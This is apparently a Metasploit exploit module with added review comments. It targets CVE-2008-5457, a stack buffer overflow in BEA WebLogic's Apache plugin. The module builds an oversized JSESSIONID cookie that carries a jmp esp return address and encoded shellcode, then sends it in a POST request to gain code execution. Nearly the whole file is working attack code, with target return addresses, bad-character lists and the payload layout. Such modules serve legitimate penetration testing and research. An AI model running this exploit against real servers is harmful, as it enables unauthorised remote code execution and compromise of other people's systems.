Path: blob/master/modules/exploits/windows/http/bea_weblogic_jsessionid.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit for CVE-2008-5457: a stack buffer overflow in the BEA WebLogic
# Apache plugin triggered by an over-long JSESSIONID cookie value. Per the
# description below the vulnerable path is only reachable when the plugin is
# configured for clustering, so a non-clustered target will not be affected.
#
# NOTE(review): the description text says "JSESSION" while the request sent
# by #exploit uses the JSESSIONID cookie name; the header name is what the
# exploit actually relies on.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp
  # NOTE(review): the Seh mixin is included and EXITFUNC defaults to 'seh', but
  # both targets use a plain 'jmp esp' return address and no SEH record is
  # built here — presumably a leftover; confirm before relying on it.
  include Msf::Exploit::Remote::Seh

  # Module metadata: author, references, payload constraints and the two
  # supported WebLogic plugin builds (each with its own 'jmp esp' address).
  def initialize(info = {})
    targets = [
      [
        'Windows Apache 2.2 - WebLogic module version 1.0.1136334',
        { 'Ret' => 0x1006c9b5 } # jmp esp
      ],
      [
        'Windows Apache 2.2 - WebLogic module version 1.0.1150354',
        { 'Ret' => 0x1006c9be } # jmp esp
      ]
    ]

    payload_opts = {
      'Space' => 800,
      # The value travels inside a Cookie header, so bytes that would end the
      # header (CR/LF), split cookie pairs (space, ';', '=', ',') or terminate
      # a C string (NUL) are excluded from the encoded payload.
      'BadChars' => "\x00\x0d\x0a\x20\x3B\x3D\x2C",
      'StackAdjustment' => -3500
    }

    super(
      update_info(
        info,
        'Name' => 'BEA WebLogic JSESSIONID Cookie Value Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable
          code is only accessible when clustering is configured. A request containing a
          long JSESSION cookie value can lead to arbitrary code execution.
        },
        'Author' => 'pusscat',
        'References' => [
          [ 'CVE', '2008-5457' ],
          [ 'OSVDB', '51311' ],
        ],
        'DefaultOptions' => { 'EXITFUNC' => 'seh' },
        'Privileged' => true,
        'Platform' => 'win',
        'Payload' => payload_opts,
        'Targets' => targets,
        'DefaultTarget' => 1,
        'DisclosureDate' => '2009-01-13',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # Only the TCP port is configurable; the HTTP Host header is fixed to
    # "localhost" in #exploit.
    register_options([Opt::RPORT(80)])
  end

  # Builds the oversized JSESSIONID value and sends it in a single POST.
  #
  # The 10000-byte value is random alphanumeric filler with the target's
  # return address written at offset 8181 and the encoded payload placed
  # immediately after it, so that the 'jmp esp' gadget presumably lands on
  # the payload bytes. The handler is started before the socket is closed.
  def exploit
    ret_offset = 8181
    ret_bytes = [target.ret].pack('V')
    shellcode = payload.encoded

    cookie_value = Rex::Text.rand_text_alphanumeric(10000, payload_badchars)
    cookie_value[ret_offset, ret_bytes.length] = ret_bytes
    cookie_value[ret_offset + ret_bytes.length, shellcode.length] = shellcode

    # Adjacent literals are joined at parse time; the resulting request is the
    # same bytes as a single concatenated string.
    request = "POST /index.jsp HTTP/1.1\r\n" \
              "Host: localhost\r\n" \
              "Cookie: TAGLINE=IAMMCLOVIN; JSESSIONID=#{cookie_value}\r\n\r\n"

    connect
    sock.put(request)
    handler
    disconnect
  end
end